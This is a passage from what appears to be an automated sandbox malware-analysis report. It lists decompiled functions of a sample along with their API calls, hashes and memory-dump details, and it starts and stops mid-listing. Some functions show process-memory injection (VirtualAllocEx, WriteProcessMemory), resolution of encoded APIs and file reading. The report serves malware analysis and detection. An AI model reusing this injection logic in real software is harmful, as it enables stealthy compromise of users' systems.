				void* _t82;
				void* _t83;
				void* _t84;
				intOrPtr* _t85;
				WCHAR** _t87;
				WCHAR** _t88;

				_t80 = __ecx;
				_push( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x18)) + 8)));
				_t22 = E005CC720();
				if(_t22 == 0) {
					return _t22;
				}
				 *_t85 = _t22;
				_t23 = E005C5140(0x10);
				_t87 = _t85 + 4;
				_t59 = _t23;
				E005C91B0(_t23, 4);
				 *0x5d9d54(0x5d9bbc);
				if( *_t80 == 0) {
					L6:
					_t26 = E005CC430(_t59);
					_t78 =  *_t87;
					if(_t26 == 0) {
						L11:
						 *0x5d9d9c(0x5d9bbc);
						E005C1EA0(_t59);
						L005D7400(_t59);
						_t88 =  &(_t87[1]);
						if(E005CC430( *((intOrPtr*)(_t80 + 0x10))) == 0) {
							L18:
							if(E005CC430( *((intOrPtr*)(_t80 + 0x14))) == 0) {
								L25:
								return E005C91E0(_t78);
							}
							_t81 = 0;
							do {
								_t33 = E005C42F0( *((intOrPtr*)(_t80 + 0x14)), _t81);
								_t60 = _t33;
								if(lstrcmpiW( *_t33, _t78) == 0) {
									E005C91E0( *_t60);
									_t88 =  &(_t88[1]);
									_t37 = _t60[1];
									if(_t60[1] != 0) {
										E005C91E0(_t37);
										_t88 =  &(_t88[1]);
									}
									E005CD310( *((intOrPtr*)(_t80 + 0x14)), _t81);
									_t18 = _t81 - 1; // -1
									_t81 =  !=  ? _t18 : _t81;
								}
								_t81 = _t81 + 1;
							} while (_t81 < E005CC430( *((intOrPtr*)(_t80 + 0x14))));
							goto L25;
						}
						_t82 = 0;
						do {
							_t41 = E005C42F0( *((intOrPtr*)(_t80 + 0x10)), _t82);
							_t61 = _t41;
							if(lstrcmpiW( *_t41, _t78) == 0) {
								_t44 = _t61[1];
								if(_t61[1] != 0) {
									E005C91E0(_t44);
									_t88 =  &(_t88[1]);
								}
								E005C91E0( *_t61);
								_t88 =  &(_t88[1]);
								E005CD310( *((intOrPtr*)(_t80 + 0x10)), _t82);
								_t12 = _t82 - 1; // -1
								_t82 =  !=  ? _t12 : _t82;
							}
							_t82 = _t82 + 1;
						} while (_t82 < E005CC430( *((intOrPtr*)(_t80 + 0x10))));
						goto L18;
					}
					_t83 = 0;
					do {
						_t49 = E005C42F0(_t59, _t83);
						_t50 =  *_t49;
						if( *_t49 != 0) {
							E005CD6B0(_t80, _t50, 0, _t87[7]);
						}
						_t83 = _t83 + 1;
					} while (_t83 < E005CC430(_t59));
					goto L11;
				}
				_t84 = 0;
				_t79 = 0;
				do {
					if(lstrcmpiW( *( *((intOrPtr*)( *((intOrPtr*)(_t80 + 4)) + _t84)) + 8),  *_t87) == 0) {
						E005C1200(_t59,  *((intOrPtr*)(_t80 + 4)) + _t84);
					}
					_t79 = _t79 + 1;
					_t84 = _t84 + 4;
				} while (_t79 <  *_t80);
				goto L6;
			}

0x005d0099
0x005d009b
0x005d009e
0x005d00a5
0x00000000
0x005d021c
0x005d00ab
0x005d00b0
0x005d00b5
0x005d00b8
0x005d00be
0x005d00c8
0x005d00d1
0x005d0102
0x005d0104
0x005d0109
0x005d010e
0x005d013a
0x005d013f
0x005d0147
0x005d014d
0x005d0152
0x005d015f
0x005d01b3
0x005d01bd
0x005d0211
0x00000000
0x005d0217
0x005d01bf
0x005d01c1
0x005d01c5
0x005d01ca
0x005d01d7
0x005d01db
0x005d01e0
0x005d01e3
0x005d01e8
0x005d01eb
0x005d01f0
0x005d01f0
0x005d01f7
0x005d01fc
0x005d0201
0x005d0201
0x005d0207
0x005d020d
0x00000000
0x005d01c1
0x005d0161
0x005d0163
0x005d0167
0x005d016c
0x005d0179
0x005d017b
0x005d0180
0x005d0183
0x005d0188
0x005d0188
0x005d018d
0x005d0192
0x005d0199
0x005d019e
0x005d01a3
0x005d01a3
0x005d01a9
0x005d01af
0x00000000
0x005d0163
0x005d0110
0x005d0112
0x005d0115
0x005d011a
0x005d011e
0x005d0129
0x005d0129
0x005d0130
0x005d0136
0x00000000
0x005d0112
0x005d00d3
0x005d00d5
0x005d00d7
0x005d00eb
0x005d00f5
0x005d00f5
0x005d00fa
0x005d00fb
0x005d00fe
0x00000000

APIs

RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005D00C8
lstrcmpiW.KERNEL32(?,?,?,00000000,00000000,?,00000000,005CCB66), ref: 005D00E3
RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D013F
lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000,005CCB66), ref: 005D0171
lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000,005CCB66), ref: 005D01CF

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: lstrcmpi$CriticalSection$EnterLeave
String ID:
API String ID: 3699066220-0
Opcode ID: 7e7532ef1e58fca7423902032cea1be5c941c5bee592e78b864112836d914bdb
Instruction ID: ca05997229098d9ee6a778ed02a338c09484f6a99c471128f2152787ea4b6094
Opcode Fuzzy Hash: 7e7532ef1e58fca7423902032cea1be5c941c5bee592e78b864112836d914bdb
Instruction Fuzzy Hash: 714187747042069FDB30BFE5DC5EF2B7EA9BF80745F04042EF84A86292EA61E805D661

Uniqueness

Uniqueness Score: -1.00%

Function 005D5320, Relevance: 7.6, APIs: 5, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E005D5320(void* __ecx, void* __eflags) {
				void* _t38;
				intOrPtr _t39;
				signed int _t40;
				void* _t41;
				void* _t42;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t63;
				intOrPtr* _t69;
				intOrPtr _t70;
				void* _t72;
				void* _t76;
				signed int* _t77;
				void* _t78;
				intOrPtr* _t79;

				_t76 = __ecx;
				E005D7C90( *((intOrPtr*)(__ecx + 0x60)),  *((intOrPtr*)(__ecx + 0x64)));
				_t79 = _t78 + 8;
				_t38 =  *(_t76 + 0x5c);
				if(_t38 != 0) {
					_t69 = _t79 + 4;
					 *_t69 = 0;
					_push(0);
					_push(0);
					_push(_t38);
					_push(_t69);
					_push(3);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x60)) +  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x60)) + 0x3c)) + 0x28)) + _t38);
					_push(_t76);
					E005D3FA0();
					_t79 = _t79 + 0x1c;
				}
				if( *((intOrPtr*)(_t76 + 0x7c)) == 0 || E005D3DF0(_t76) != 0) {
					_t70 =  *((intOrPtr*)(_t76 + 0x60));
					_t39 =  *((intOrPtr*)(_t70 + 0x3c));
					 *_t79 = _t39;
					_t40 =  *(_t70 + _t39 + 6) & 0x0000ffff;
					if(_t40 == 0) {
						L9:
						_t57 =  *(_t76 + 0x5c);
						_t41 =  *(_t76 + 0x70);
						if(_t57 != 0) {
							VirtualFreeEx(_t41, _t57, 0, 0x8000);
							_t58 =  *(_t76 + 0x5c);
							_t41 =  *(_t76 + 0x70);
							if(_t58 != 0) {
								VirtualFreeEx(_t41, _t58,  *(_t70 +  *((intOrPtr*)(_t79 + 4)) + 0x50), 0x4000);
								_t41 =  *(_t76 + 0x70);
							}
						}
						if(_t41 != 0) {
							CloseHandle(_t41);
							 *(_t76 + 0x70) = 0;
						}
						_t42 =  *(_t76 + 0x74);
						if(_t42 != 0) {
							CloseHandle(_t42);
							 *(_t76 + 0x74) = 0;
						}
						_t72 = 1;
						 *((intOrPtr*)(_t76 + 0x80)) = 0;
						 *((intOrPtr*)(_t76 + 0x44)) = 0;
						goto L18;
					}
					_t54 = 0;
					_t77 = _t70 + ( *(_t70 +  *_t79 + 0x14) & 0x0000ffff) +  *_t79 + 0x24;
					do {
						_t63 =  *(_t76 + 0x5c) + ( *_t77 << 2);
						if(_t63 != 0) {
							VirtualFreeEx( *(_t76 + 0x70), _t63, 0, 0x8000);
							_t40 =  *(_t70 +  *_t79 + 6) & 0x0000ffff;
						}
						_t54 = _t54 + 1;
						_t77 =  &(_t77[0xa]);
					} while (_t54 < (_t40 & 0x0000ffff));
					goto L9;
				} else {
					_t72 = 0;
					L18:
					E005D7C90( *((intOrPtr*)(_t76 + 0x60)),  *((intOrPtr*)(_t76 + 0x64)));
					return _t72;
				}
			}

0x005d5327
0x005d532f
0x005d5334
0x005d5337
0x005d533c
0x005d5340
0x005d5344
0x005d5352
0x005d5353
0x005d5354
0x005d5355
0x005d5356
0x005d5358
0x005d5359
0x005d535a
0x005d535f
0x005d535f
0x005d5366
0x005d5377
0x005d537a
0x005d537d
0x005d5380
0x005d5388
0x005d53c9
0x005d53c9
0x005d53cc
0x005d53d1
0x005d53dc
0x005d53e2
0x005d53e5
0x005d53ea
0x005d53fb
0x005d5401
0x005d5401
0x005d53ea
0x005d5406
0x005d5409
0x005d540f
0x005d540f
0x005d5416
0x005d541b
0x005d541e
0x005d5424
0x005d5424
0x005d542f
0x005d5430
0x005d5436
0x00000000
0x005d5436
0x005d538d
0x005d5396
0x005d539a
0x005d53a0
0x005d53a3
0x005d53b0
0x005d53b9
0x005d53b9
0x005d53be
0x005d53c2
0x005d53c5
0x00000000
0x005d543b
0x005d543b
0x005d543d
0x005d5443
0x005d5454
0x005d5454

APIs

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,005CD839), ref: 005D53B0
VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,005CD839), ref: 005D53DC
VirtualFreeEx.KERNEL32(?,?,?,00004000,?,?,?,005CD839), ref: 005D53FB
CloseHandle.KERNEL32(?), ref: 005D5409
CloseHandle.KERNEL32(?), ref: 005D541E

Part of subcall function 005D3FA0: ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3FCD
Part of subcall function 005D3FA0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 005D4070
Part of subcall function 005D3FA0: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 005D4095

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Virtual$Free$CloseHandleMemoryProcess$AllocReadWrite
String ID:
API String ID: 1889406058-0
Opcode ID: aeeb6352b80cdf8a5ea3b40a276fa491a07fa15c152a66d0221b5d6a8fd61944
Instruction ID: f5329dea773c4350320d1615488aea492bf40b7411864354a086e58501b51369
Opcode Fuzzy Hash: aeeb6352b80cdf8a5ea3b40a276fa491a07fa15c152a66d0221b5d6a8fd61944
Instruction Fuzzy Hash: 7E418774600B01ABDB359F29DC89B2ABBE5FB44705F04491FE98287790EB70F815CB60

Uniqueness

Uniqueness Score: -1.00%

Function 005D5630, Relevance: 7.6, APIs: 5, Instructions: 82
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E005D5630(void* __eax, void* __ecx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v20;
				void* _t9;
				long _t13;
				void* _t15;
				void* _t19;
				signed int _t20;
				void* _t24;
				void* _t26;
				long _t27;
				DWORD* _t29;

				_t20 = 0;
				_v20 = 0;
				_t9 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t26 = _t9;
				if(_t9 == 0xffffffff) {
					_t24 = 0;
					goto L7;
				} else {
					_t20 = 0;
					_t13 = SetFilePointer(_t26, 0, 0, 2);
					_t27 = _t13;
					_v20 = _t13;
					SetFilePointer(_t26, 0, 0, 0);
					_t15 = E005C3180(_t27, 0);
					_t29 =  &(_t29[2]);
					_t24 = _t15;
					if(_t15 != 0 && ReadFile(_t26, _t24, _t27, _t29, 0) != 0) {
						E005D7C90(_t24, _v20);
						_push(_a12);
						_push(_a8);
						_t19 = E005D4830(_t24, _v20);
						_t29 =  &(_t29[6]);
						_t20 = 0 | _t19 != 0x00000000;
					}
					if(_t26 != 0) {
						L7:
						CloseHandle(_t26);
					} else {
					}
				}
				if(_t24 != 0) {
					E005C91E0(_t24);
					_t29 =  &(_t29[1]);
				}
				return _t20;
			}

0x005d5639
0x005d563b
0x005d564f
0x005d5655
0x005d565a
0x005d56c8
0x00000000
0x005d565c
0x005d5662
0x005d5669
0x005d566b
0x005d566d
0x005d5674
0x005d5678
0x005d567d
0x005d5680
0x005d5684
0x005d56a4
0x005d56ac
0x005d56ad
0x005d56b3
0x005d56b8
0x005d56bf
0x005d56bf
0x005d56c4
0x005d56ca
0x005d56cb
0x00000000
0x005d56c6
0x005d56c4
0x005d56d3
0x005d56d6
0x005d56db
0x005d56db
0x005d56e7

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 005D564F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005D5669
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005D5674

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005D568E
CloseHandle.KERNEL32(00000000), ref: 005D56CB

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: File$HeapPointer$AllocateCloseCreateHandleProcessRead
String ID:
API String ID: 2919383809-0
Opcode ID: f69ccd87e4880429cb6067376177a3d9cf22d8259ac850b08455f645c7d5a0f5
Instruction ID: 1f43e7d2689ff1f78022d1c0c4f177b567fa58fdd9c39e128e842f7f5ae786c5
Opcode Fuzzy Hash: f69ccd87e4880429cb6067376177a3d9cf22d8259ac850b08455f645c7d5a0f5
Instruction Fuzzy Hash: 7C11E2B12006097FE2312A696C89F3B3E9CEF85398F45042BF944D6351EA61DD05D6B2

Uniqueness

Uniqueness Score: -1.00%

Function 005C5370, Relevance: 7.6, APIs: 5, Instructions: 81networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 005C538D
gethostname.WS2_32(?,000000FF), ref: 005C53AA
getaddrinfo.WS2_32(?,00000000,00000000), ref: 005C53C0
FreeAddrInfoW.WS2_32(00000000), ref: 005C5444
WSACleanup.WS2_32 ref: 005C544F

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: AddrCleanupFreeInfoStartupgetaddrinfogethostname
String ID:
API String ID: 2736887295-0
Opcode ID: 70dff35793b30c02feb75cc4b788c959ed5d9ce2cb87c1481e5451f26b484a07
Instruction ID: 481576b75ff604f1b391310f333df22ba226a3621a78f4ba213ca2f37ccdd094
Opcode Fuzzy Hash: 70dff35793b30c02feb75cc4b788c959ed5d9ce2cb87c1481e5451f26b484a07
Instruction Fuzzy Hash: 77213A31A41A115FFF3886E48CC8F726B99FB50322F48013EDE11862A1F734ACC29652

Uniqueness

Uniqueness Score: -1.00%

Function 005D7BE0, Relevance: 7.6, APIs: 5, Instructions: 77
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005D7BE0(void* __eax, WCHAR* _a4, void** _a8, long* _a12) {
				void* _t7;
				long _t8;
				long _t10;
				void* _t13;
				void* _t17;
				void* _t21;
				void* _t22;
				long* _t23;
				long _t24;
				DWORD* _t25;

				_t23 = _a12;
				_t22 = 0;
				 *_t25 = 0;
				_t7 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t7 == 0xffffffff) {
					_t8 = 0;
					_t17 = 0;
				} else {
					_t21 = _t7;
					_t22 = 0;
					_t10 = SetFilePointer(_t7, 0, 0, 2);
					_t24 = _t10;
					 *_t25 = _t10;
					SetFilePointer(_t21, 0, 0, 0);
					_t17 = 1;
					if(_t24 != 0) {
						_t13 = E005C3180(_t24, 0);
						_t25 =  &(_t25[2]);
						if(_t13 == 0) {
							L5:
							_t22 = 0;
							_t17 = 0;
						} else {
							_t22 = _t13;
							if(ReadFile(_t21, _t22, _t24, _t25, 0) == 0) {
								E005C91E0(_t22);
								_t25 =  &(_t25[1]);
								 *_t25 = 0;
								goto L5;
							}
						}
					}
					_t23 = _a12;
					CloseHandle(_t21);
					_t8 =  *_t25;
				}
				 *_a8 = _t22;
				 *_t23 = _t8;
				return _t17;
			}

0x005d7be5
0x005d7bed
0x005d7bef
0x005d7c03
0x005d7c0c
0x005d7c78
0x005d7c7a
0x005d7c0e
0x005d7c14
0x005d7c16
0x005d7c1d
0x005d7c1f
0x005d7c21
0x005d7c28
0x005d7c2c
0x005d7c2f
0x005d7c34
0x005d7c39
0x005d7c3e
0x005d7c64
0x005d7c64
0x005d7c66
0x005d7c40
0x005d7c40
0x005d7c52
0x005d7c55
0x005d7c5a
0x005d7c5d
0x00000000
0x005d7c5d
0x005d7c52
0x005d7c3e
0x005d7c68
0x005d7c6d
0x005d7c73
0x005d7c73
0x005d7c80
0x005d7c82
0x005d7c8e

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 005D7C03
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?), ref: 005D7C1D
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 005D7C28
CloseHandle.KERNEL32(00000000), ref: 005D7C6D

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005D7C4A

Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: File$Heap$Pointer$AllocateCloseCreateFreeHandleProcessRead
String ID:
API String ID: 1200625078-0
Opcode ID: a11eefc251ba2620f30fa555079560848f2a8e517e36f9c0275a82c467dfa1a3
Instruction ID: 8adb75b5d4bfec79d8fc4c884f46f2fecbfd1b3550db6bc8f7734c00c153d402
Opcode Fuzzy Hash: a11eefc251ba2620f30fa555079560848f2a8e517e36f9c0275a82c467dfa1a3
Instruction Fuzzy Hash: 57118171215324BFD3309E699C89F6B7EDCFF4A7A4F01052EF948D6290E6609D04C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 005D18C0, Relevance: 7.6, APIs: 5, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005D18C0(signed int __ecx, void* __eflags) {
				char _v524;
				struct HINSTANCE__* _t7;
				signed int _t8;
				signed int _t20;
				CHAR* _t22;
				WCHAR* _t23;
				struct HINSTANCE__* _t24;
				void* _t25;
				CHAR* _t26;

				_t20 = __ecx;
				_t23 =  &_v524;
				E005D4520(_t23, 0x41);
				_t26 = _t25 + 8;
				_t7 = LoadLibraryW(_t23);
				_t24 = _t7;
				if(_t7 == 0) {
					_t8 =  *0x5d9c00; // 0x0
				} else {
					_t22 = _t26;
					E005D7160(_t22, 0x42);
					 *0x5d9c4c = GetProcAddress(_t24, _t22);
					E005D7160(_t22, 0x43);
					 *0x5d9be8 = GetProcAddress(_t24, _t22);
					E005D7160(_t22, 0x44);
					 *0x5d9b80 = GetProcAddress(_t24, _t22);
					E005D7160(_t22, 0x45);
					_t8 = GetProcAddress(_t24, _t22);
					 *0x5d9c00 = _t8;
				}
				return (_t8 & 0xffffff00 | _t8 != 0x00000000) & (_t20 & 0xffffff00 | _t24 != 0x00000000) & 0x000000ff;
			}

0x005d18c0
0x005d18c9
0x005d18d3
0x005d18d8
0x005d18dc
0x005d18e2
0x005d18e6
0x005d1942
0x005d18e8
0x005d18e8
0x005d18ed
0x005d18ff
0x005d1907
0x005d1913
0x005d191b
0x005d1927
0x005d192f
0x005d1939
0x005d193b
0x005d193b
0x005d195f

APIs

LoadLibraryW.KERNEL32(?), ref: 005D18DC
GetProcAddress.KERNEL32(00000000), ref: 005D18FD
GetProcAddress.KERNEL32(00000000), ref: 005D1911
GetProcAddress.KERNEL32(00000000), ref: 005D1925
GetProcAddress.KERNEL32(00000000), ref: 005D1939

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 6413e6ccf9b8f8a5d0d7d4503fe57bc93f12c6fb8176bd425470806df1a9e0a7
Instruction ID: 1a5c704c06b7cd0747ea4e811dc04f0cfce77ecbe4f10ea14cf5f130ad9767c9
Opcode Fuzzy Hash: 6413e6ccf9b8f8a5d0d7d4503fe57bc93f12c6fb8176bd425470806df1a9e0a7
Instruction Fuzzy Hash: 0E01B9B190251577D2326725BC86EAF3BACBFE7701F440017FA0896351FB284A49D6BE

Uniqueness

Uniqueness Score: -1.00%

Function 005CF5A0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E005CF5A0(short* __ecx, void* __eflags) {
				void* _t73;
				intOrPtr _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr _t84;
				intOrPtr _t86;
				short* _t88;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr* _t94;
				void* _t95;
				signed int _t96;
				intOrPtr _t104;
				void* _t105;
				short* _t106;
				intOrPtr _t108;
				void* _t109;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				short* _t118;
				WCHAR* _t119;
				signed int _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t129;
				void* _t136;
				intOrPtr _t139;

				_t129 = __eflags;
				_t118 = __ecx;
				E005D6610(_t125, 0, 0x864);
				_t126 = _t125 + 0xc;
				_t94 = _t126 + 0x54;
				_t73 = E005CFA90(_t118, _t129, 0, _t94, 0, 0, 1);
				_t74 =  *_t94;
				if(_t73 == 0 || _t74 == 0) {
					L31:
					if(_t74 != 0) {
						E005C91E0(_t74);
						_t126 = _t126 + 4;
					}
					return  *((intOrPtr*)(_t126 + 0x60));
				} else {
					_t119 = _t126 + 0x64;
					_t77 = GetSystemDirectoryW(_t119, 0x200);
					 *(_t119 - 8) = _t77;
					 *((intOrPtr*)(_t126 + 0x64 + _t77 * 2)) = 0x5c;
					E005D4520(_t126 + 0x66 +  *(_t119 - 8) * 2, 0x5c);
					_t127 = _t126 + 8;
					_t82 = E005D4520(_t127 + 0x464, 0x79);
					_t126 = _t127 + 8;
					 *(_t119 - 8) = _t82;
					if(0x400 - _t82 <= 0) {
						_t108 = 0x80070057;
						if(__eflags != 0) {
							 *((short*)(_t126 + 0x464 + _t82 * 2)) = 0;
						}
						goto L11;
					} else {
						_t104 =  *((intOrPtr*)(_t126 + 0x54));
						_t95 = _t126 + 0x462 + _t82 * 2;
						_t123 = 0;
						_t109 = _t95;
						while(1) {
							_t114 =  *(_t104 + _t123 * 2) & 0x0000ffff;
							if(_t114 == 0) {
								break;
							}
							 *(_t95 + 2 + _t123 * 2) = _t114;
							_t109 = _t109 + 2;
							_t23 = _t123 + 1; // 0x1
							_t117 = _t23;
							if(_t82 + _t123 == 0x3ff) {
								L7:
								_t25 = _t82 + _t117 != 0x400;
								 *((short*)(_t109 + (0 | _t25) * 2)) = 0;
								_t108 = 0x8007007a;
								if(_t25 == 0) {
									L11:
									 *((intOrPtr*)(_t126 + 0x58)) = _t108;
									L30:
									_t74 =  *((intOrPtr*)(_t126 + 0x54));
									goto L31;
								}
								L13:
								_t124 = _t126 + 0x64;
								_t139 =  *0x5d9ae8; // 0x0
								 *((intOrPtr*)(_t126 + 0x58)) = 0;
								if(_t139 == 0) {
									L27:
									if( *((intOrPtr*)(_t126 + 0x60)) != 0) {
										L29:
										_t84 =  *0x5d9b0c; // 0x26f2b8
										 *((intOrPtr*)(_t84 + 8)) = 1;
										goto L30;
									}
									_t86 = E005D6E60(0, _t124, _t126 + 0x464);
									_t126 = _t126 + 0xc;
									 *((intOrPtr*)(_t126 + 0x60)) = _t86;
									if(_t86 == 0) {
										goto L30;
									}
									goto L29;
								}
								E005C91E0(_t104);
								_t88 = E005C3180(0x800, 0);
								_t126 = _t126 + 0xc;
								_t105 = 0xfffff800;
								 *((intOrPtr*)(_t126 + 0x54)) = _t88;
								while(1) {
									_t110 =  *(_t126 + _t105 + 0x864) & 0x0000ffff;
									if(_t110 == 0) {
										break;
									}
									 *(_t88 + _t105 + 0x800) = _t110;
									_t105 = _t105 + 2;
									if(_t105 != 0) {
										continue;
									}
									 *((short*)(_t88 + _t105 + 0x7fe)) = 0;
									 *((intOrPtr*)(_t126 + 0x58)) = 0x8007007a;
									goto L27;
								}
								 *(_t88 + _t105 + 0x800) = 0;
								_t111 = 0x400;
								_t106 = _t88;
								 *((intOrPtr*)(_t126 + 0x58)) = 0;
								while(1) {
									__eflags =  *_t106;
									if( *_t106 == 0) {
										break;
									}
									_t106 = _t106 + 2;
									_t111 = _t111 - 1;
									__eflags = _t111;
									if(_t111 != 0) {
										continue;
									}
									_t92 = 0x80070057;
									L26:
									 *((intOrPtr*)(_t126 + 0x58)) = _t92;
									goto L27;
								}
								_t115 = 0;
								__eflags = 0;
								while(1) {
									_t96 = _t115;
									_t116 =  *(_t126 + 0x464 + _t115 * 2) & 0x0000ffff;
									__eflags = _t116;
									if(_t116 == 0) {
										break;
									}
									 *(_t106 + _t96 * 2) = _t116;
									_t53 = _t96 + 1; // 0x1
									_t115 = _t53;
									__eflags = _t111 - _t115;
									if(_t111 != _t115) {
										continue;
									}
									_t92 = 0x8007007a;
									 *(_t106 + _t96 * 2) = 0;
									goto L26;
								}
								 *(_t106 + _t96 * 2) = 0;
								 *((intOrPtr*)(_t126 + 0x58)) = 0;
								_push(0);
								_push(0);
								_push(0x420);
								_push(_t88);
								_push(_t126 + 0x48);
								_t89 = E005C5470(_t126 + 0x44);
								_t126 = _t126 + 0x18;
								__eflags = _t89;
								if(_t89 != 0) {
									CloseHandle( *(_t126 + 0x44));
									CloseHandle( *(_t126 + 0x48));
									 *((intOrPtr*)(_t126 + 0x60)) = 1;
								}
								goto L27;
							}
							_t136 = _t123 - 0x7ffffffd;
							_t123 = _t117;
							if(_t136 != 0) {
								continue;
							}
							goto L7;
						}
						 *(_t95 + 2 + _t123 * 2) = 0;
						goto L13;
					}
				}
			}

0x005cf5a0
0x005cf5ac
0x005cf5b7
0x005cf5bc
0x005cf5bf
0x005cf5cb
0x005cf5d2
0x005cf5d4
0x005cf792
0x005cf794
0x005cf797
0x005cf79c
0x005cf79c
0x005cf7ad
0x005cf5e2
0x005cf5e2
0x005cf5ec
0x005cf5f7
0x005cf5fa
0x005cf608
0x005cf60d
0x005cf61a
0x005cf61f
0x005cf627
0x005cf62e
0x005cf683
0x005cf688
0x005cf68a
0x005cf68a
0x00000000
0x005cf630
0x005cf630
0x005cf634
0x005cf63b
0x005cf63d
0x005cf63f
0x005cf63f
0x005cf646
0x00000000
0x00000000
0x005cf64b
0x005cf650
0x005cf653
0x005cf653
0x005cf65c
0x005cf668
0x005cf671
0x005cf674
0x005cf67a
0x005cf67f
0x005cf694
0x005cf694
0x005cf78e
0x005cf78e
0x00000000
0x005cf78e
0x005cf6a4
0x005cf6a6
0x005cf6aa
0x005cf6b0
0x005cf6b4
0x005cf760
0x005cf765
0x005cf782
0x005cf782
0x005cf787
0x00000000
0x005cf787
0x005cf772
0x005cf777
0x005cf77c
0x005cf780
0x00000000
0x00000000
0x00000000
0x005cf780
0x005cf6bb
0x005cf6ca
0x005cf6cf
0x005cf6d2
0x005cf6d7
0x005cf6db
0x005cf6db
0x005cf6e6
0x00000000
0x00000000
0x005cf6e8
